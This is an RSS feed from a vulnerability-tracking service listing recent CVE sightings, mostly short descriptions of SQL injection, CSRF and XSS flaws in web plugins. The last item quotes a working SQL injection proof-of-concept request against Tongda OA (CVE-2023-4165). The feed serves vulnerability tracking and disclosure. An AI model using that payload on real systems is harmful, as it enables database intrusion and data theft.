<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent sightings.</title>
    <link>https://vulnerability.circl.lu</link>
    <description>Contains only the most 10 recent sightings.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Sat, 18 Jul 2026 20:19:45 +0000</lastBuildDate>
    <item>
      <title>f6e4c38b-a14d-417e-a096-5d2338e8cd46</title>
      <link>https://vulnerability.circl.lu/sighting/f6e4c38b-a14d-417e-a096-5d2338e8cd46/export</link>
      <description>{"uuid": "f6e4c38b-a14d-417e-a096-5d2338e8cd46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41656", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mb6cyenwnm2e", "content": "", "creation_timestamp": "2025-12-30T02:37:13.274064Z"}</description>
      <content:encoded>{"uuid": "f6e4c38b-a14d-417e-a096-5d2338e8cd46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41656", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mb6cyenwnm2e", "content": "", "creation_timestamp": "2025-12-30T02:37:13.274064Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/f6e4c38b-a14d-417e-a096-5d2338e8cd46/export</guid>
      <pubDate>Tue, 30 Dec 2025 02:37:13 +0000</pubDate>
    </item>
    <item>
      <title>f5d526cd-a652-4a82-bdd6-5efe72b80e56</title>
      <link>https://vulnerability.circl.lu/sighting/f5d526cd-a652-4a82-bdd6-5efe72b80e56/export</link>
      <description>{"uuid": "f5d526cd-a652-4a82-bdd6-5efe72b80e56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41652", "type": "seen", "source": "https://t.me/cibsecurity/73521", "content": "\u203c CVE-2023-41652 \u203c\n\nImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in David F. Carr RSVPMaker rsvpmaker allows SQL Injection.This issue affects RSVPMaker: from n/a through 10.6.6.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-11-03T15:23:26.000000Z"}</description>
      <content:encoded>{"uuid": "f5d526cd-a652-4a82-bdd6-5efe72b80e56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41652", "type": "seen", "source": "https://t.me/cibsecurity/73521", "content": "\u203c CVE-2023-41652 \u203c\n\nImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in David F. Carr RSVPMaker rsvpmaker allows SQL Injection.This issue affects RSVPMaker: from n/a through 10.6.6.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-11-03T15:23:26.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/f5d526cd-a652-4a82-bdd6-5efe72b80e56/export</guid>
      <pubDate>Fri, 03 Nov 2023 15:23:26 +0000</pubDate>
    </item>
    <item>
      <title>1702c1ec-a08b-4055-837c-5982bca4f5f7</title>
      <link>https://vulnerability.circl.lu/sighting/1702c1ec-a08b-4055-837c-5982bca4f5f7/export</link>
      <description>{"uuid": "1702c1ec-a08b-4055-837c-5982bca4f5f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41659", "type": "seen", "source": "https://t.me/cibsecurity/71728", "content": "\u203c CVE-2023-41659 \u203c\n\nCross-Site Request Forgery (CSRF) vulnerability in Jules Colle, BDWM Responsive Gallery Grid plugin &amp;lt;=\u00c2\u00a02.3.10 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-10-06T18:13:42.000000Z"}</description>
      <content:encoded>{"uuid": "1702c1ec-a08b-4055-837c-5982bca4f5f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41659", "type": "seen", "source": "https://t.me/cibsecurity/71728", "content": "\u203c CVE-2023-41659 \u203c\n\nCross-Site Request Forgery (CSRF) vulnerability in Jules Colle, BDWM Responsive Gallery Grid plugin &amp;lt;=\u00c2\u00a02.3.10 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-10-06T18:13:42.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/1702c1ec-a08b-4055-837c-5982bca4f5f7/export</guid>
      <pubDate>Fri, 06 Oct 2023 18:13:42 +0000</pubDate>
    </item>
    <item>
      <title>f4b1bf4a-4d47-4593-b606-76977678ba2f</title>
      <link>https://vulnerability.circl.lu/sighting/f4b1bf4a-4d47-4593-b606-76977678ba2f/export</link>
      <description>{"uuid": "f4b1bf4a-4d47-4593-b606-76977678ba2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41650", "type": "seen", "source": "https://t.me/cibsecurity/71725", "content": "\u203c CVE-2023-41650 \u203c\n\nCross-Site Request Forgery (CSRF) vulnerability in Venugopal Remove/hide Author, Date, Category Like Entry-Meta plugin &amp;lt;=\u00c2\u00a02.1 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-10-06T18:13:39.000000Z"}</description>
      <content:encoded>{"uuid": "f4b1bf4a-4d47-4593-b606-76977678ba2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41650", "type": "seen", "source": "https://t.me/cibsecurity/71725", "content": "\u203c CVE-2023-41650 \u203c\n\nCross-Site Request Forgery (CSRF) vulnerability in Venugopal Remove/hide Author, Date, Category Like Entry-Meta plugin &amp;lt;=\u00c2\u00a02.1 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-10-06T18:13:39.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/f4b1bf4a-4d47-4593-b606-76977678ba2f/export</guid>
      <pubDate>Fri, 06 Oct 2023 18:13:39 +0000</pubDate>
    </item>
    <item>
      <title>a869d187-22dd-4c6b-b1e3-9fc45a08da0a</title>
      <link>https://vulnerability.circl.lu/sighting/a869d187-22dd-4c6b-b1e3-9fc45a08da0a/export</link>
      <description>{"uuid": "a869d187-22dd-4c6b-b1e3-9fc45a08da0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41654", "type": "seen", "source": "https://t.me/cibsecurity/71721", "content": "\u203c CVE-2023-41654 \u203c\n\nCross-Site Request Forgery (CSRF) vulnerability in Andreas Heigl authLdap plugin &amp;lt;=\u00c2\u00a02.5.8 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-10-06T18:13:35.000000Z"}</description>
      <content:encoded>{"uuid": "a869d187-22dd-4c6b-b1e3-9fc45a08da0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41654", "type": "seen", "source": "https://t.me/cibsecurity/71721", "content": "\u203c CVE-2023-41654 \u203c\n\nCross-Site Request Forgery (CSRF) vulnerability in Andreas Heigl authLdap plugin &amp;lt;=\u00c2\u00a02.5.8 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-10-06T18:13:35.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/a869d187-22dd-4c6b-b1e3-9fc45a08da0a/export</guid>
      <pubDate>Fri, 06 Oct 2023 18:13:35 +0000</pubDate>
    </item>
    <item>
      <title>41196796-2b1f-4056-b80e-ddd5c536bdd4</title>
      <link>https://vulnerability.circl.lu/sighting/41196796-2b1f-4056-b80e-ddd5c536bdd4/export</link>
      <description>{"uuid": "41196796-2b1f-4056-b80e-ddd5c536bdd4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41658", "type": "seen", "source": "https://t.me/cibsecurity/71305", "content": "\u203c CVE-2023-41658 \u203c\n\nUnauth. Reflected Cross-Site Scripting (XSS) vulnerability in I Thirteen Web Solution Photo Gallery Slideshow &amp;amp; Masonry Tiled Gallery plugin &amp;lt;=\u00c2\u00a01.0.13 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-09-29T18:37:56.000000Z"}</description>
      <content:encoded>{"uuid": "41196796-2b1f-4056-b80e-ddd5c536bdd4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41658", "type": "seen", "source": "https://t.me/cibsecurity/71305", "content": "\u203c CVE-2023-41658 \u203c\n\nUnauth. Reflected Cross-Site Scripting (XSS) vulnerability in I Thirteen Web Solution Photo Gallery Slideshow &amp;amp; Masonry Tiled Gallery plugin &amp;lt;=\u00c2\u00a01.0.13 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-09-29T18:37:56.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/41196796-2b1f-4056-b80e-ddd5c536bdd4/export</guid>
      <pubDate>Fri, 29 Sep 2023 18:37:56 +0000</pubDate>
    </item>
    <item>
      <title>53b9f705-5679-42a6-aa26-d27b26fb34e9</title>
      <link>https://vulnerability.circl.lu/sighting/53b9f705-5679-42a6-aa26-d27b26fb34e9/export</link>
      <description>{"uuid": "53b9f705-5679-42a6-aa26-d27b26fb34e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41657", "type": "seen", "source": "https://t.me/cibsecurity/71302", "content": "\u203c CVE-2023-41657 \u203c\n\nAuth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Groundhogg Inc. HollerBox plugin &amp;lt;=\u00c2\u00a02.3.2 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-09-29T18:37:52.000000Z"}</description>
      <content:encoded>{"uuid": "53b9f705-5679-42a6-aa26-d27b26fb34e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41657", "type": "seen", "source": "https://t.me/cibsecurity/71302", "content": "\u203c CVE-2023-41657 \u203c\n\nAuth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Groundhogg Inc. HollerBox plugin &amp;lt;=\u00c2\u00a02.3.2 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-09-29T18:37:52.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/53b9f705-5679-42a6-aa26-d27b26fb34e9/export</guid>
      <pubDate>Fri, 29 Sep 2023 18:37:52 +0000</pubDate>
    </item>
    <item>
      <title>878749e6-f952-412c-82ff-7e5ccf89114b</title>
      <link>https://vulnerability.circl.lu/sighting/878749e6-f952-412c-82ff-7e5ccf89114b/export</link>
      <description>{"uuid": "878749e6-f952-412c-82ff-7e5ccf89114b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41655", "type": "seen", "source": "https://t.me/cibsecurity/71297", "content": "\u203c CVE-2023-41655 \u203c\n\nAuth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Andreas Heigl authLdap plugin &amp;lt;=\u00c2\u00a02.5.9 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-09-29T18:37:47.000000Z"}</description>
      <content:encoded>{"uuid": "878749e6-f952-412c-82ff-7e5ccf89114b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-41655", "type": "seen", "source": "https://t.me/cibsecurity/71297", "content": "\u203c CVE-2023-41655 \u203c\n\nAuth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Andreas Heigl authLdap plugin &amp;lt;=\u00c2\u00a02.5.9 versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-09-29T18:37:47.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/878749e6-f952-412c-82ff-7e5ccf89114b/export</guid>
      <pubDate>Fri, 29 Sep 2023 18:37:47 +0000</pubDate>
    </item>
    <item>
      <title>be4fd763-d8ee-4186-983c-74e2502b7850</title>
      <link>https://vulnerability.circl.lu/sighting/be4fd763-d8ee-4186-983c-74e2502b7850/export</link>
      <description>{"uuid": "be4fd763-d8ee-4186-983c-74e2502b7850", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-4165", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/858", "content": "\u901a\u8fbeOA sql\u6ce8\u5165\u6f0f\u6d1e CVE-2023-4165  POC\n\nGET /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1\nHost: 127.0.0.1:8080\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n2023  \ud83c\udde8\ud83c\uddf3\u62a4\u7f51poc\n#poc", "creation_timestamp": "2023-08-12T14:58:46.000000Z"}</description>
      <content:encoded>{"uuid": "be4fd763-d8ee-4186-983c-74e2502b7850", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-4165", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/858", "content": "\u901a\u8fbeOA sql\u6ce8\u5165\u6f0f\u6d1e CVE-2023-4165  POC\n\nGET /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1\nHost: 127.0.0.1:8080\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n2023  \ud83c\udde8\ud83c\uddf3\u62a4\u7f51poc\n#poc", "creation_timestamp": "2023-08-12T14:58:46.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/be4fd763-d8ee-4186-983c-74e2502b7850/export</guid>
      <pubDate>Sat, 12 Aug 2023 14:58:46 +0000</pubDate>
    </item>
  </channel>
</rss>
